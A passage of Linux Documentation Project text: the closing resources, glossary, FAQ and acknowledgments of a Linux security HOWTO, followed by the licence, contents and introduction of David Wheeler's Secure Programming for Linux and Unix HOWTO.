    security tools: [http://www.trouble.org] http://www.trouble.org

<A0><A0>*<2A> The Linux security WWW is a good site for Linux security information:
    [http://www.aoy.com/Linux/Security/] Linux Security WWW

<A0><A0>*<2A> Infilsec has a vulnerability engine that can tell you what
    vulnerabilities affect a specific platform: [http://www.infilsec.com/
    vulnerabilities/] http://www.infilsec.com/vulnerabilities/

<A0><A0>*<2A> CIAC sends out periodic security bulletins on common exploits: [http://
    ciac.llnl.gov/cgi-bin/index/bulletins] http://ciac.llnl.gov/cgi-bin/index
    /bulletins

<A0><A0>*<2A> A good starting point for Linux Pluggable Authentication modules can be
    found at [http://www.kernel.org/pub/linux/libs/pam/] http://
    www.kernel.org/pub/linux/libs/pam/.

<A0><A0>*<2A> The Debian project has a web page for their security fixes and
    information. It is at [http://www.debian.com/security/] http://
    www.debian.com/security/.

<A0><A0>*<2A>  WWW Security FAQ, written by Lincoln Stein, is a great web security
    reference. Find it at [http://www.w3.org/Security/Faq/
    www-security-faq.html] http://www.w3.org/Security/Faq/
    www-security-faq.html


-----------------------------------------------------------------------------
11.4. Mailing Lists

 Bugtraq: To subscribe to bugtraq, send mail to listserv@netspace.org
containing the message body subscribe bugtraq. (see links above for
archives).

 CIAC: Send e-mail to majordomo@tholia.llnl.gov. In the BODY (not subject) of
the message put (either or both): subscribe ciac-bulletin

  Red Hat has a number of mailing lists, the most important of which is the
redhat-announce list. You can read about security (and other) fixes as soon
as they come out. Send email to redhat-announce-list-request@redhat.com with
the Subject Subscribe See [https://listman.redhat.com/mailman/listinfo/]
https://listman.redhat.com/mailman/listinfo/ for more info and archives.

 The Debian project has a security mailing list that covers their security
fixes. See [http://www.debian.com/security/] http://www.debian.com/security/
for more information.
-----------------------------------------------------------------------------

11.5. Books - Printed Reading Material

 There are a number of good security books out there. This section lists a
few of them. In addition to the security specific books, security is covered
in a number of other books on system administration.


<A0><A0>*<2A> Building Internet Firewalls By D. Brent Chapman & Elizabeth D. Zwicky,
    1st Edition September 1995, ISBN: 1-56592-124-0

<A0><A0>*<2A> Practical UNIX & Internet Security, 2nd Edition By Simson Garfinkel &
    Gene Spafford, 2nd Edition April 1996, ISBN: 1-56592-148-8

<A0><A0>*<2A> Computer Security Basics By Deborah Russell & G.T. Gangemi, Sr., 1st
    Edition July 1991, ISBN: 0-937175-71-4

<A0><A0>*<2A> Linux Network Administrator's Guide By Olaf Kirch, 1st Edition January
    1995, ISBN: 1-56592-087-2

<A0><A0>*<2A> PGP: Pretty Good Privacy By Simson Garfinkel, 1st Edition December 1994,
    ISBN: 1-56592-098-8

<A0><A0>*<2A> Computer Crime A Crimefighter's Handbook By David Icove, Karl Seger &
    William VonStorch (Consulting Editor Eugene H. Spafford), 1st Edition
    August 1995, ISBN: 1-56592-086-4

<A0><A0>*<2A> Linux Security By John S. Flowers, New Riders; ISBN: 0735700354, March
    1999

<A0><A0>*<2A> Maximum Linux Security : A Hacker's Guide to Protecting Your Linux
    Server and Network, Anonymous, Paperback - 829 pages, Sams; ISBN:
    0672313413, July 1999

<A0><A0>*<2A> Intrusion Detection By Terry Escamilla, Paperback - 416 pages (September
    1998), John Wiley and Sons; ISBN: 0471290009

<A0><A0>*<2A> Fighting Computer Crime, Donn Parker, Paperback - 526 pages (September
    1998), John Wiley and Sons; ISBN: 0471163783


-----------------------------------------------------------------------------
12. Glossary

 Included below are several of the most frequently used terms in computer
security. A comprehensive dictionary of computer security terms is available
in the [http://www.linuxsecurity.com/dictionary/] LinuxSecurity.com
Dictionary


<A0><A0>*<2A> authentication: The process of knowing that the data received is the
    same as the data that was sent, and that the claimed sender is in fact
    the actual sender.

<A0><A0>*<2A> bastion Host: A computer system that must be highly secured because it
    is vulnerable to attack, usually because it is exposed to the Internet
    and is a main point of contact for users of internal networks. It gets
    its name from the highly fortified projects on the outer walls of
    medieval castles. Bastions overlook critical areas of defense, usually
    having strong walls, room for extra troops, and the occasional useful tub
    of boiling hot oil for discouraging attackers.

<A0><A0>*<2A> buffer overflow: Common coding style is to never allocate large enough
    buffers, and to not check for overflows. When such buffers overflow, the
    executing program (daemon or set-uid program) can be tricked in doing
    some other things. Generally this works by overwriting a function's
    return address on the stack to point to another location.

<A0><A0>*<2A> denial of service: An attack that consumes the resources on your
    computer for things it was not intended to be doing, thus preventing
    normal use of your network resources for legitimate purposes.

<A0><A0>*<2A> dual-homed Host: A general-purpose computer system that has at least two
    network interfaces.

<A0><A0>*<2A> firewall: A component or set of components that restricts access between
    a protected network and the Internet, or between other sets of networks.

<A0><A0>*<2A> host: A computer system attached to a network.

<A0><A0>*<2A> IP spoofing: IP Spoofing is a complex technical attack that is made up
    of several components. It is a security exploit that works by tricking
    computers in a trust relationship into thinking that you are someone that
    you really aren't. There is an extensive paper written by daemon9, route,
    and infinity in the Volume Seven, Issue Forty-Eight issue of Phrack
    Magazine.

<A0><A0>*<2A> non-repudiation: The property of a receiver being able to prove that the
    sender of some data did in fact send the data even though the sender
    might later deny ever having sent it.

<A0><A0>*<2A> packet: The fundamental unit of communication on the Internet.

<A0><A0>*<2A> packet filtering: The action a device takes to selectively control the
    flow of data to and from a network. Packet filters allow or block
    packets, usually while routing them from one network to another (most
    often from the Internet to an internal network, and vice-versa). To
    accomplish packet filtering, you set up rules that specify what types of
    packets (those to or from a particular IP address or port) are to be
    allowed and what types are to be blocked.

<A0><A0>*<2A> perimeter network: A network added between a protected network and an
    external network, in order to provide an additional layer of security. A
    perimeter network is sometimes called a DMZ.

<A0><A0>*<2A> proxy server: A program that deals with external servers on behalf of
    internal clients. Proxy clients talk to proxy servers, which relay
    approved client requests to real servers, and relay answers back to
    clients.

<A0><A0>*<2A> superuser: An informal name for root.


-----------------------------------------------------------------------------
13. Frequently Asked Questions


 1.   Is it more secure to compile driver support directly into the kernel,
    instead of making it a module?

     Answer: Some people think it is better to disable the ability to load
    device drivers using modules, because an intruder could load a Trojan
    module or a module that could affect system security.

     However, in order to load modules, you must be root. The module object
    files are also only writable by root. This means the intruder would need
    root access to insert a module. If the intruder gains root access, there
    are more serious things to worry about than whether he will load a
    module.

     Modules are for dynamically loading support for a particular device that
    may be infrequently used. On server machines, or firewalls for instance,
    this is very unlikely to happen. For this reason, it would make more
    sense to compile support directly into the kernel for machines acting as
    a server. Modules are also slower than support compiled directly in the
    kernel.

 2.   Why does logging in as root from a remote machine always fail?

     Answer: See Section 4.2. This is done intentionally to prevent remote
    users from attempting to connect via telnet to your machine as root,
    which is a serious security vulnerability, because then the root password
    would be transmitted, in clear text, across the network. Don't forget:
    potential intruders have time on their side, and can run automated
    programs to find your password. Additionally, this is done to keep a
    clear record of who logged in, not just root.

 3.   How do I enable shadow passwords on my Linux box?

     Answer:

     To enable shadow passwords, run pwconv as root, and /etc/shadow should
    now exist, and be used by applications. If you are using RH 4.2 or above,
    the PAM modules will automatically adapt to the change from using normal
    /etc/passwd to shadow passwords without any other change.

     Some background: shadow passwords is a mechanism for storing your
    password in a file other than the normal /etc/passwd file. This has
    several advantages. The first one is that the shadow file, /etc/shadow,
    is only readable by root, unlike /etc/passwd, which must remain readable
    by everyone. The other advantage is that as the administrator, you can
    enable or disable accounts without everyone knowing the status of other
    users' accounts.

     The /etc/passwd file is then used to store user and group names, used by
    programs like /bin/ls to map the user ID to the proper user name in a
    directory listing.

     The /etc/shadow file then only contains the user name and his/her
    password, and perhaps accounting information, like when the account
    expires, etc.

     To enable shadow passwords, run pwconv as root, and /etc/shadow should
    now exist, and be used by applications. Since you are using RH 4.2 or
    above, the PAM modules will automatically adapt to the change from using
    normal /etc/passwd to shadow passwords without any other change.

     Since you're interested in securing your passwords, perhaps you would
    also be interested in generating good passwords to begin with. For this
    you can use the pam_cracklib module, which is part of PAM. It runs your
    password against the Crack libraries to help you decide if it is
    too-easily guessable by password-cracking programs.

 4.   How can I enable the Apache SSL extensions?

     Answer:


     a.  Get SSLeay 0.8.0 or later from [ftp://ftp.psy.uq.oz.au/pub/Crypto/
        SSL] ??

     b.  Build and test and install it!

     c.  Get Apache source

     d.  Get Apache SSLeay extensions from [ftp://ftp.ox.ac.uk/pub/crypto/SSL
        /] here

     e.  Unpack it in the apache source directory and patch Apache as per the
        README.

     f.  Configure and build it.


     You might also try [http://www.zedz.net] ZEDZ net which has many
    pre-built packages, and is located outside of the United States.

 5.   How can I manipulate user accounts, and still retain security?

     Answer: most distributions contain a great number of tools to change the
    properties of user accounts.


    <20><>+<2B> The pwconv and unpwconv programs can be used to convert between
        shadow and non-shadowed passwords.

    <20><>+<2B> The pwck and grpck programs can be used to verify proper
        organization of the passwd and group files.

    <20><>+<2B> The useradd, usermod, and userdel programs can be used to add,
        delete and modify user accounts. The groupadd, groupmod, and groupdel
        programs will do the same for groups.

    <20><>+<2B> Group passwords can be created using gpasswd.


     All these programs are "shadow-aware" -- that is, if you enable shadow
    they will use /etc/shadow for password information, otherwise they won't.

     See the respective man pages for further information.

 6.   How can I password-protect specific HTML documents using Apache?

     I bet you didn't know about [http://www.apacheweek.com] http://
    www.apacheweek.org, did you?

     You can find information on user authentication at [http://
    www.apacheweek.com/features/userauth] http://www.apacheweek.com/features/
    userauth as well as other web server security tips from [http://
    www.apache.org/docs/misc/security_tips.html] http://www.apache.org/docs/
    misc/security_tips.html


-----------------------------------------------------------------------------
14. Conclusion

 By subscribing to the security alert mailing lists, and keeping current, you
can do a lot towards securing your machine. If you pay attention to your log
files and run something like tripwire regularly, you can do even more.

 A reasonable level of computer security is not difficult to maintain on a
home machine. More effort is required on business machines, but Linux can
indeed be a secure platform. Due to the nature of Linux development, security
fixes often come out much faster than they do on commercial operating
systems, making Linux an ideal platform when security is a requirement.
-----------------------------------------------------------------------------

15. Acknowledgments

 Information here is collected from many sources. Thanks to the following who
either indirectly or directly have contributed:


Rob Riggs
[mailto:rob@DevilsThumb.com] rob@DevilsThumb.com

 S. Coffin [mailto:scoffin@netcom.com] scoffin@netcom.com

 Viktor Przebinda [mailto:viktor@CRYSTAL.MATH.ou.edu]
viktor@CRYSTAL.MATH.ou.edu

 Roelof Osinga [mailto:roelof@eboa.com] roelof@eboa.com

 Kyle Hasselbacher [mailto:kyle@carefree.quux.soltec.net]
kyle@carefree.quux.soltc.net

 David S. Jackson [mailto:dsj@dsj.net] dsj@dsj.net

 Todd G. Ruskell [mailto:ruskell@boulder.nist.gov] ruskell@boulder.nist.gov

 Rogier Wolff [mailto:R.E.Wolff@BitWizard.nl] R.E.Wolff@BitWizard.nl

 Antonomasia [mailto:ant@notatla.demon.co.uk] ant@notatla.demon.co.uk

 Nic Bellamy [mailto:sky@wibble.net] sky@wibble.net

 Eric Hanchrow [mailto:offby1@blarg.net] offby1@blarg.net

 Robert J. Berger[mailto:rberger@ibd.com] rberger@ibd.com

 Ulrich Alpers [mailto:lurchi@cdrom.uni-stuttgart.de]
lurchi@cdrom.uni-stuttgart.de

 David Noha [mailto:dave@c-c-s.com] dave@c-c-s.com

 Pavel Epifanov. [mailto:epv@ibm.net] epv@ibm.net

 Joe Germuska. [mailto:joe@germuska.com] joe@germuska.com

 Franklin S. Werren [mailto:fswerren@bagpipes.net] fswerren@bagpipes.net

 Paul Rusty Russell [mailto:Paul.Russell@rustcorp.com.au] <
Paul.Russell@rustcorp.com.au>

 Christine Gaunt [mailto:cgaunt@umich.edu] <cgaunt@umich.edu>

 lin [mailto:bhewitt@refmntutl01.afsc.noaa.gov]
bhewitt@refmntutl01.afsc.noaa.gov

 A. Steinmetz [mailto:astmail@yahoo.com] astmail@yahoo.com

 Jun Morimoto [mailto:morimoto@xantia.citroen.org]
morimoto@xantia.citroen.org

 Xiaotian Sun [mailto:sunx@newton.me.berkeley.edu]
sunx@newton.me.berkeley.edu

 Eric Hanchrow [mailto:offby1@blarg.net] offby1@blarg.net

 Camille Begnis [mailto:camille@mandrakesoft.com] camille@mandrakesoft.com

 Neil D [mailto:neild@sympatico.ca] neild@sympatico.ca

 Michael Tandy [mailto:Michael.Tandy@BTInternet.com]
Michael.Tandy@BTInternet.com

 Tony Foiani [mailto:tkil@scrye.com] tkil@scrye.com

 Matt Johnston [mailto:mattj@flashmail.com] mattj@flashmail.com

 Geoff Billin [mailto:gbillin@turbonet.com] gbillin@turbonet.com

 Hal Burgiss [mailto:hburgiss@bellsouth.net] hburgiss@bellsouth.net

 Ian Macdonald [mailto:ian@linuxcare.com] ian@linuxcare.com

 M.Kiesel [mailto:m.kiesel@iname.com] m.kiesel@iname.com

 Mario Kratzer [mailto:kratzer@mathematik.uni-marburg.de]
kratzer@mathematik.uni-marburg.de

 Othmar Pasteka [mailto:pasteka@kabsi.at] pasteka@kabsi.at

 Robert M [mailto:rom@romab.com] rom@romab.com

 Cinnamon Lowe [mailto:clowe@cinci.rr.com] clowe@cinci.rr.com

 Rob McMeekin [mailto:blind_mordecai@yahoo.com] blind_mordecai@yahoo.com

 Gunnar Ritter [mailto:g-r@bigfoot.de] g-r@bigfoot.de

  Frank Lichtenheld[mailto:frank@lichtenheld.de] frank@lichtenheld.de

 Björn Lotz[mailto:blotz@suse.de] blotz@suse.de

 Othon Marcelo Nunes Batista[mailto:othonb@superig.com.br]
othonb@superig.com.br

 The following have translated this HOWTO into various other languages!

 A special thank you to all of them for help spreading the Linux word...

 Polish: Ziemek Borowski [mailto:ziembor@FAQ-bot.ZiemBor.Waw.PL]
ziembor@FAQ-bot.ZiemBor.Waw.PL

 Japanese: FUJIWARA Teruyoshi [mailto:fjwr@mtj.biglobe.ne.jp]
fjwr@mtj.biglobe.ne.jp

 Indonesian: Tedi Heriyanto [mailto:22941219@students.ukdw.ac.id]
22941219@students.ukdw.ac.id

 Korean: Bume Chang [mailto:Boxcar0001@aol.com] Boxcar0001@aol.com

 Spanish: Juan Carlos Fernandez [mailto:piwiman@visionnetware.com]
piwiman@visionnetware.com

 Dutch: "Nine Matthijssen" [mailto:nine@matthijssen.nl] nine@matthijssen.nl

 Norwegian: ketil@vestby.com [mailto:ketil@vestby.com] ketil@vestby.com

 Turkish: tufan karadere [mailto:tufank@metu.edu.tr] tufank@metu.edu.tr


Secure Programming for Linux and Unix HOWTO

David A. Wheeler

v3.010<A0>Edition

Copyright <20> 1999, 2000, 2001, 2002, 2003 David A. Wheeler

v3.010, 3 March 2003


This book provides a set of design and implementation guidelines for writing
secure programs for Linux and Unix systems. Such programs include application
programs used as viewers of remote data, web applications (including CGI
scripts), network servers, and setuid/setgid programs. Specific guidelines
for C, C++, Java, Perl, PHP, Python, Tcl, and Ada95 are included. For a
current version of the book, see [http://www.dwheeler.com/secure-programs]
http://www.dwheeler.com/secure-programs

This book is Copyright (C) 1999-2003 David A. Wheeler. Permission is granted
to copy, distribute and/or modify this book under the terms of the GNU Free
Documentation License (GFDL), Version 1.1 or any later version published by
the Free Software Foundation; with the invariant sections being ``About the
Author'', with no Front-Cover Texts, and no Back-Cover texts. A copy of the
license is included in the section entitled "GNU Free Documentation License".
This book is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
A PARTICULAR PURPOSE.

-----------------------------------------------------------------------------
Table of Contents
1. Introduction
2. Background
    2.1. History of Unix, Linux, and Open Source / Free Software
    2.2. Security Principles
    2.3. Why do Programmers Write Insecure Code?
    2.4. Is Open Source Good for Security?
    2.5. Types of Secure Programs
    2.6. Paranoia is a Virtue
    2.7. Why Did I Write This Document?
    2.8. Sources of Design and Implementation Guidelines
    2.9. Other Sources of Security Information
    2.10. Document Conventions


3. Summary of Linux and Unix Security Features
    3.1. Processes
    3.2. Files
    3.3. System V IPC
    3.4. Sockets and Network Connections
    3.5. Signals
    3.6. Quotas and Limits
    3.7. Dynamically Linked Libraries
    3.8. Audit
    3.9. PAM
    3.10. Specialized Security Extensions for Unix-like Systems


4. Security Requirements
    4.1. Common Criteria Introduction
    4.2. Security Environment and Objectives
    4.3. Security Functionality Requirements
    4.4. Security Assurance Measure Requirements


5. Validate All Input
    5.1. Command line
    5.2. Environment Variables
    5.3. File Descriptors
    5.4. File Names
    5.5. File Contents
    5.6. Web-Based Application Inputs (Especially CGI Scripts)
    5.7. Other Inputs
    5.8. Human Language (Locale) Selection
    5.9. Character Encoding
    5.10. Prevent Cross-site Malicious Content on Input
    5.11. Filter HTML/URIs That May Be Re-presented
    5.12. Forbid HTTP GET To Perform Non-Queries
    5.13. Counter SPAM
    5.14. Limit Valid Input Time and Load Level


6. Avoid Buffer Overflow
    6.1. Dangers in C/C++
    6.2. Library Solutions in C/C++
    6.3. Compilation Solutions in C/C++
    6.4. Other Languages


7. Structure Program Internals and Approach
    7.1. Follow Good Software Engineering Principles for Secure Programs
    7.2. Secure the Interface
    7.3. Separate Data and Control
    7.4. Minimize Privileges
    7.5. Minimize the Functionality of a Component
    7.6. Avoid Creating Setuid/Setgid Scripts
    7.7. Configure Safely and Use Safe Defaults
    7.8. Load Initialization Values Safely
    7.9. Fail Safe
    7.10. Avoid Race Conditions
    7.11. Trust Only Trustworthy Channels
    7.12. Set up a Trusted Path
    7.13. Use Internal Consistency-Checking Code
    7.14. Self-limit Resources
    7.15. Prevent Cross-Site (XSS) Malicious Content
    7.16. Foil Semantic Attacks
    7.17. Be Careful with Data Types


8. Carefully Call Out to Other Resources
    8.1. Call Only Safe Library Routines
    8.2. Limit Call-outs to Valid Values
    8.3. Handle Metacharacters
    8.4. Call Only Interfaces Intended for Programmers
    8.5. Check All System Call Returns
    8.6. Avoid Using vfork(2)
    8.7. Counter Web Bugs When Retrieving Embedded Content
    8.8. Hide Sensitive Information


9. Send Information Back Judiciously
    9.1. Minimize Feedback
    9.2. Don't Include Comments
    9.3. Handle Full/Unresponsive Output
    9.4. Control Data Formatting (Format Strings/Formatation)
    9.5. Control Character Encoding in Output
    9.6. Prevent Include/Configuration File Access


10. Language-Specific Issues
    10.1. C/C++
    10.2. Perl
    10.3. Python
    10.4. Shell Scripting Languages (sh and csh Derivatives)
    10.5. Ada
    10.6. Java
    10.7. Tcl
    10.8. PHP


11. Special Topics
    11.1. Passwords
    11.2. Authenticating on the Web
    11.3. Random Numbers
    11.4. Specially Protect Secrets (Passwords and Keys) in User Memory
    11.5. Cryptographic Algorithms and Protocols
    11.6. Using PAM
    11.7. Tools
    11.8. Windows CE
    11.9. Write Audit Records
    11.10. Physical Emissions
    11.11. Miscellaneous


12. Conclusion
13. Bibliography
A. History
B. Acknowledgements
C. About the Documentation License
D. GNU Free Documentation License
E. Endorsements
F. About the Author

List of Tables
5-1. Legal UTF-8 Sequences

List of Figures
1-1. Abstract View of a Program

-----------------------------------------------------------------------------
Chapter 1. Introduction

<A0>                                      A wise man attacks the city of the
                                       mighty and pulls down the stronghold
                                       in which they trust.
<A0>                                                        Proverbs 21:22 (NIV)

This book describes a set of guidelines for writing secure programs on Linux
and Unix systems. For purposes of this book, a ``secure program'' is a
program that sits on a security boundary, taking input from a source that
does not have the same access rights as the program. Such programs include
application programs used as viewers of remote data, web applications
(including CGI scripts), network servers, and setuid/setgid programs. This
book does not address modifying the operating system kernel itself, although
many of the principles discussed here do apply. These guidelines were
developed as a survey of ``lessons learned'' from various sources on how to
create such programs (along with additional observations by the author),
reorganized into a set of larger principles. This book includes specific
guidance for a number of languages, including C, C++, Java, Perl, PHP,
Python, Tcl, and Ada95.

You can find the master copy of this book at [http://www.dwheeler.com/
secure-programs] http://www.dwheeler.com/secure-programs. This book is also
part of the Linux Documentation Project (LDP) at [http://www.tldp.org] http:/
/www.tldp.org It's also mirrored in several other places. Please note that
these mirrors, including the LDP copy and/or the copy in your distribution,
may be older than the master copy. I'd like to hear comments on this book,
but please do not send comments until you've checked to make sure that your
comment is valid for the latest version.

This book does not cover assurance measures, software engineering processes,
and quality assurance approaches, which are important but widely discussed
elsewhere. Such measures include testing, peer review, configuration
management, and formal methods. Documents specifically identifying sets of
development assurance measures for security issues include the Common
Criteria (CC, [CC 1999]) and the Systems Security Engineering Capability
Maturity Model [SSE-CMM 1999]. Inspections and other peer review techniques
are discussed in [Wheeler 1996]. This book does briefly discuss ideas from
the CC, but only as an organizational aid to discuss security requirements.
More general sets of software engineering processes are defined in documents
such as the Software Engineering Institute's Capability Maturity Model for
Software (SW-CMM) [Paulk 1993a, 1993b] and ISO 12207 [ISO 12207]. General
international standards for quality systems are defined in ISO 9000 and ISO
9001 [ISO 9000, 9001].

This book does not discuss how to configure a system (or network) to be
secure in a given environment. This is clearly necessary for secure use of a
given program, but a great many other documents discuss secure
configurations. An excellent general book on configuring Unix-like systems to
be secure is Garfinkel [1996]. Other books for securing Unix-like systems
include Anonymous [1998]. You can also find information on configuring
Unix-like systems at web sites such as [http://www.unixtools.com/
security.html] http://www.unixtools.com/security.html. Information on
configuring a Linux system to be secure is available in a wide variety of
documents including Fenzi [1999], Seifried [1999], Wreski [1998], Swan
[2001], and Anonymous [1999]. Geodsoft [2001] describes how to harden
OpenBSD, and many of its suggestions are useful for any Unix-like system.
Information on auditing existing Unix-like systems are discussed in Mookhey
[2002]. For Linux systems (and eventually other Unix-like systems), you may
want to examine the Bastille Hardening System, which attempts to ``harden''
or ``tighten'' the Linux operating system. You can learn more about Bastille
at [http://www.bastille-linux.org] http://www.bastille-linux.org; it is
available for free under the General Public License (GPL). Other hardening
systems include [http://www.grsecurity.net] grsecurity. For Windows 2000, you
might want to look at Cox [2000]. The U.S. National Security Agency (NSA)
maintains a set of security recommendation guides at [http://
nsa1.www.conxion.com] http://nsa1.www.conxion.com, including the ``60 Minute
Network Security Guide.'' If you're trying to establish a public key
infrastructure (PKI) using open source tools, you might want to look at the
[http://ospkibook.sourceforge.net] Open Source PKI Book. More about firewalls
and Internet security is found in [Cheswick 1994].

Configuring a computer is only part of Security Management, a larger area
that also covers how to deal with viruses, what kind of organizational
security policy is needed, business continuity plans, and so on. There are
international standards and guidance for security management. ISO 13335 is a
five-part technical report giving guidance on security management [ISO
13335]. ISO/IEC 17799:2000 defines a code of practice [ISO 17799]; its stated
purpose is to give high-level and general ``recommendations for information
security management for use by those who are responsible for initiating,
implementing or maintaining security in their organization.'' The document
specifically identifies itself as "a starting point for developing
organization specific guidance." It also states that not all of the guidance
and controls it contains may be applicable, and that additional controls not
contained may be required. Even more importantly, they are intended to be
broad guidelines covering a number of areas. and not intended to give
definitive details or "how-tos". It's worth noting that the original signing
of ISO/IEC 17799:2000 was controversial; Belgium, Canada, France, Germany,
Italy, Japan and the US voted against its adoption. However, it appears that
these votes were primarily a protest on parliamentary procedure, not on the
content of the document, and certainly people are welcome to use ISO 17799 if
they find it helpful. More information about ISO 17799 can be found in NIST's
[http://csrc.nist.gov/publications/secpubs/otherpubs/reviso-faq.pdf] ISO/IEC
17799:2000 FAQ. ISO 17799 is highly related to BS 7799 part 1 and 2; more
information about BS 7799 can be found at [http://www.xisec.com/faq.htm]
http://www.xisec.com/faq.htm. ISO 17799 is currently under revision. It's
important to note that none of these standards (ISO 13335, ISO 17799, or BS
7799 parts 1 and 2) are intended to be a detailed set of technical guidelines
for software developers; they are all intended to provide broad guidelines in
a number of areas. This is important, because software developers who simply
only follow (for example) ISO 17799 will generally not produce secure
software - developers need much, much, much more detail than ISO 17799
provides.

The Commonly Accepted Security Practices & Recommendations (CASPR) project at
[http://www.caspr.org] http://www.caspr.org is trying to distill information
security knowledge into a series of papers available to all (under the GNU
FDL license, so that future document derivatives will continue to be
available to all). Clearly, security management needs to include keeping with
patches as vulnerabilities are found and fixed. Beattie [2002] provides an
interesting analysis on how to determine when to apply patches contrasting
risk of a bad patch to the risk of intrusion (e.g., under certain conditions,
patches are optimally applied 10 or 30 days after they are released).

If you're interested in the current state of vulnerabilities, there are other
resources available to use. The CVE at http://cve.mitre.org gives a standard
identifier for each (widespread) vulnerability. The paper [http://
securitytracker.com/learn/securitytracker-stats-2002.pdf] SecurityTracker
Statistics analyzes vulnerabilities to determine what were the most common
vulnerabilities. The Internet Storm Center at http://isc.incidents.org/ shows
the prominence of various Internet attacks around the world.

This book assumes that the reader understands computer security issues in
general, the general security model of Unix-like systems, networking (in
particular TCP/IP based networks), and the C programming language. This book
does include some information about the Linux and Unix programming model for
security. If you need more information on how TCP/IP based networks and
protocols work, including their security protocols, consult general works on
TCP/IP such as [Murhammer 1998].

When I first began writing this document, there were many short articles but
no books on writing secure programs. There are now two other books on writing
secure programs. One is ``Building Secure Software'' by John Viega and Gary
McGraw [Viega 2002]; this is a very good book that discusses a number of
important security issues, but it omits a large number of important security
problems that are instead covered here. Basically, this book selects several
important topics and covers them well, but at the cost of omitting many other
important topics. The Viega book has a little more information for Unix-like
systems than for Windows systems, but much of it is independent of the kind
of system. The other book is ``Writing Secure Code'' by Michael Howard and
David LeBlanc [Howard 2002]. The title of this other book is misleading; the
book is solely about writing secure programs for Windows, and is basically
worthless if you are writing programs for any other system. This shouldn't be
surprising; it's published by Microsoft press, and its copyright is owned by
Microsoft. If you are trying to write secure programs for Microsoft's Windows
systems, it's a good book. Another useful source of secure programming
guidance is the The Open Web Application Security Project (OWASP) Guide to
Building Secure Web Applications and Web Services; it has more on process,
and less specifics than this book, but it has useful material in it.

This book covers all Unix-like systems, including Linux and the various
strains of Unix, and it particularly stresses Linux and provides details
about Linux specifically. There's some material specifically on Windows CE,
and in fact much of this material is not limited to a particular operating
system. If you know relevant information not already included here, please
let me know.

This book is copyright (C) 1999-2002 David A. Wheeler and is covered by the
GNU Free Documentation License (GFDL); see Appendix C and Appendix D for more
information.

Chapter 2 discusses the background of Unix, Linux, and security. Chapter 3
describes the general Unix and Linux security model, giving an overview of
the security attributes and operations of processes, filesystem objects, and
so on. This is followed by the meat of this book, a set of design and
implementation guidelines for developing applications on Linux and Unix
systems. The book ends with conclusions in Chapter 12, followed by a lengthy
bibliography and appendixes.

The design and implementation guidelines are divided into categories which I
believe emphasize the programmer's viewpoint. Programs accept inputs, process
data, call out to other resources, and produce output, as shown in Figure 1-1
; notionally all security guidelines fit into one of these categories. I've
subdivided ``process data'' into structuring program internals and approach,
avoiding buffer overflows (which in some cases can also be considered an
input issue), language-specific information, and special topics. The chapters
are ordered to make the material easier to follow. Thus, the book chapters
giving guidelines discuss validating all input (Chapter 5), avoiding buffer
overflows (Chapter 6), structuring program internals and approach (Chapter 7
), carefully calling out to other resources (Chapter 8), judiciously sending
information back (Chapter 9), language-specific information (Chapter 10), and
finally information on special topics such as how to acquire random numbers (
Chapter 11).


Figure 1-1. Abstract View of a Program

[program]
-----------------------------------------------------------------------------

Chapter 2. Background

<A0>                                      I issued an order and a search was
                                       made, and it was found that this city
                                       has a long history of revolt against
                                       kings and has been a place of
                                       rebellion and sedition.
<A0>                                                             Ezra 4:19 (NIV)
-----------------------------------------------------------------------------

2.1. History of Unix, Linux, and Open Source / Free Software

2.1.1. Unix

In 1969-1970, Kenneth Thompson, Dennis Ritchie, and others at AT&T Bell Labs
began developing a small operating system on a little-used PDP-7. The
operating system was soon christened Unix, a pun on an earlier operating
system project called MULTICS. In 1972-1973 the system was rewritten in the
programming language C, an unusual step that was visionary: due to this
decision, Unix was the first widely-used operating system that could switch
from and outlive its original hardware. Other innovations were added to Unix
as well, in part due to synergies between Bell Labs and the academic
community. In 1979, the ``seventh edition'' (V7) version of Unix was
released, the grandfather of all extant Unix systems.

After this point, the history of Unix becomes somewhat convoluted. The
academic community, led by Berkeley, developed a variant called the Berkeley
Software Distribution (BSD), while AT&T continued developing Unix under the
names ``System III'' and later ``System V''. In the late 1980's through early
1990's the ``wars'' between these two major strains raged. After many years
each variant adopted many of the key features of the other. Commercially,
System V won the ``standards wars'' (getting most of its interfaces into the
formal standards), and most hardware vendors switched to AT&T's System V.
However, System V ended up incorporating many BSD innovations, so the
resulting system was more a merger of the two branches. The BSD branch did
not die, but instead became widely used for research, for PC hardware, and
for single-purpose servers (e.g., many web sites use a BSD derivative).

The result was many different versions of Unix, all based on the original
seventh edition. Most versions of Unix were proprietary and maintained by
their respective hardware vendor, for example, Sun Solaris is a variant of
System V. Three versions of the BSD branch of Unix ended up as open source:
FreeBSD (concentrating on ease-of-installation for PC-type hardware), NetBSD
(concentrating on many different CPU architectures), and a variant of NetBSD,
OpenBSD (concentrating on security). More general information about Unix
history can be found at [http://www.datametrics.com/tech/unix/uxhistry/
brf-hist.htm] http://www.datametrics.com/tech/unix/uxhistry/brf-hist.htm,
[http://perso.wanadoo.fr/levenez/unix] http://perso.wanadoo.fr/levenez/unix,
and [http://www.crackmonkey.org/unix.html] http://www.crackmonkey.org/
unix.html. Much more information about the BSD history can be found in
[McKusick 1999] and [ftp://ftp.freebsd.org/pub/FreeBSD/FreeBSD-current/src/
share/misc/bsd-family-tree] ftp://ftp.freebsd.org/pub/FreeBSD/FreeBSD-current
/src/share/misc/bsd-family-tree.

A slightly old but interesting advocacy piece that presents arguments for
using Unix-like systems (instead of Microsoft's products) is [http://
web.archive.org/web/20010801155417/www.unix-vs-nt.org/kirch] John Kirch's
paper ``Microsoft Windows NT Server 4.0 versus UNIX''.
-----------------------------------------------------------------------------

2.1.2. Free Software Foundation

In 1984 Richard Stallman's Free Software Foundation (FSF) began the GNU
project, a project to create a free version of the Unix operating system. By
free, Stallman meant software that could be freely used, read, modified, and
redistributed. The FSF successfully built a vast number of useful components,
including a C compiler (gcc), an impressive text editor (emacs), and a host
of fundamental tools. However, in the 1990's the FSF was having trouble
developing the operating system kernel [FSF 1998]; without a kernel their
dream of a completely free operating system would not be realized.
-----------------------------------------------------------------------------

2.1.3. Linux

In 1991 Linus Torvalds began developing an operating system kernel, which he
named ``Linux'' [Torvalds 1999]. This kernel could be combined with the FSF
material and other components (in particular some of the BSD components and
MIT's X-windows software) to produce a freely-modifiable and very useful
operating system. This book will term the kernel itself the ``Linux kernel''
and an entire combination as ``Linux''. Note that many use the term ``GNU/
Linux'' instead for this combination.

